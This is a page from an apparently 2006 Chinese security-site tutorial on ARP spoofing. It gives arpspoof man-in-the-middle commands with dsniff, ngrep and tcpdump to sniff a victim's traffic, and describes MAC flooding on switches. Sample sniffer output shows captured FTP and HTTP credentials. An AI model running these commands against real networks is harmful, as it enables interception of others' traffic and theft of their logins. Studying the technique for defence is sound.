网络安全参考 | UNIX参考 | GPS参考 | 无线参考 | 在线手册 | OSBUG.ORG | SUNNY-NETWORK.COM
网站地图 RSS订阅
高级搜索 收藏本站
Home | 业界动态 | 防火墙 | IDS/IPS | VPN | PKI | Honeypot | Hacker/Intruder | 黑客技术 | 破解技术 | 加密技术 | 病毒防护 | 木马 | 反垃圾邮件 | 反流氓软件 | 漏洞 | 无线安全 | UNIX | Windows | 安全编程 | 安全软件 | TPM/TCG | 数据恢复 | 企业信息安全 | 个人信息安全
 当前位置: Home > 黑客技术 > 文章  
黑客经典教程之理解地址解析协议攻击
文章来源: 赛迪网 文章作者: 丁丁 发布时间: 2006-09-12   字体: [ ]
 

Setup:
     Attacker (IP: 2.2.2.2)
     Victim   (IP: 1.1.1.1) <-> Target (IP: 0.0.0.0)
 
    Term A:
     # arpspoof -t 1.1.1.1 0.0.0.0 &>/dev/null &
     # arpspoof -t 0.0.0.0 1.1.1.1 &>/dev/null &
 
    Term B:
     # dsniff | less
       -OR-
     # ngrep host 1.1.1.1 | less
       -OR-
     # tcpdump host 1.1.1.1 and not arp | less

  如果万事皆备,接着通过使用条款B中三个可选择的程序,你应该可以嗅探所有被攻击者和目标/目的地间被发送的传输。

  如果最后一些事情没有象计划中那样,那么可能有几个原因。一个原因可能是被攻击者有静态ARP表,它拒绝ARP高速缓存表中的入口覆盖。另一个可能的原因是一个类似于ARPWatch的侦察系统,它是一个ethernet/ip监视系统。提醒一下,这个特殊的MITM攻击在加密协议中不能工作。在第2段中有解释。

  3.5 包嗅探

  如果网络是通过一个hub分段的而不是一个交换机,在一个局域网(LAN)中嗅探是非常容易的。唯一的区别是一个交换在发送包的时候被组织,因此有资格称为”交换”因为它在相应的目的地之间交换包。另一方面,一个hub盲目自由的在整个网络上广播包而不对任何特定的目的地。

  显然通过采用一个MAC洪水攻击可能在一个交换机环境下嗅探。在3.1b部分大概解释了MAC地址洪水攻击。

  MAC洪水攻击的一个结果是,交换机将象一个hub,而且允许整个网络被嗅探。这给了你一个机会使用你可以使用的任何类别的嗅探软件来嗅探网络,收集包。一些流行的嗅探软件和程序包括:Dug Song 写的DSniff,LinSniffer (一个流行的版本是humble of rhino9写的LinSniffer 0.666), FX写的PHoss 和 Alberto Ornaghi, Marco Valleri 写的Ettercap 。

  PHoss输出的一个例子:

[root@genii sniff]# ./PHoss
    PHoss (Phenoelit's own security sniffer)
    (c) 1999 by Phenoelit (http://www.phenoelit.de)
    $Revision: 1.13 $
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    Source:         192.168.1.100:40895
    Destination:    72.14.0.99:80
    Protocol:       HTTP
    Data:           asrtrin:manheim
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    Source:         192.168.1.105:46537
    Destination:    72.14.0.99:21
    Protocol:       FTP
    Data:           buddy:holly
    [...]

  TCPDump 3.9.4 输出的一个例子(输出不是一样的):

[root@genii sniff]# tcpdump -vvX port 21
    tcpdump: listening on eth0, link-type EN10MB (Ethernet), 
    capture size 96 bytes
 
    [...]
    00:45:40.370082 IP (tos 0x0, ttl 111, id 43980, offset 0,
    flags [DF], proto: TCP (6), length: 57) localhost.pirhana >
    localhost.ftp: P, cksum 0x434b (correct), 1:18(17) ack 38
    win 17483
    4500 0039 abcc 4000 6f06 79e6 44ad 954f  E..9..@.o.y.D..O
    5056 bbb9 11f9 0015 6595 ed3d 6f7f 82e1  PV......e..=o...
    5018 444b 434b 0000 5553 4552 206d 7975  P.DKCK..USER.myu
    7365 726e 616d 650d 0a                   sername..
    [...]

 
推荐文章
·骇客学堂:灰鸽子VIP2006终极免
·黑客攻破SQL服务器系统的十种方
·黑客的攻击:WEB入侵的过程
·Web环境下SQL注入攻击的检测与防
·黑客经典教程之缓冲区溢出解密(
·黑客经典教程之缓冲区溢出解密(
·黑客基础内容:21种RING的提权方
·网络孙子兵法!黑客攻防也有三十
·黑客攻击常见方法及安全策略制订
·黑客技巧 使用Google黑掉Windows
 

 
共5页: 上一页 [1] [2] [3] 4 [5] 下一页
↑返回顶部   打印本页   关闭窗口↓  

Google
 
Web oldhand.org unixreference.net meshmea.org
热点文章
·黑客基础内容 DOS常见命
·攻防秘技:彻底防范网络
·黑客教程:黑客入侵个人
·很多人的Hack经历第一次
·黑客基础内容 IPC$空连
·黑客技巧 使用Google黑
·黑客攻击常见方法及安全
·黑客经典教程之缓冲区溢
相关分类
相关文章
·黑客经典教程之缓冲区溢
·黑客经典教程之缓冲区溢
·Web环境下SQL注入攻击的
·菜鸟都学会 十三步简单
·骇客学堂:跨站攻击偷取
·黑客的攻击:WEB入侵的
·黑客攻破SQL服务器系统
·黑客新人必学的网站入侵
更多...
 
 

Copyright(c) 2001-2008 OLDHAND ORGANIZATION, All Rights reserved.
Power by DedeCms 织梦内容管理系统
$Id: article_article.html,v 1.3 2007/02/10 12:00:37 yjs Exp $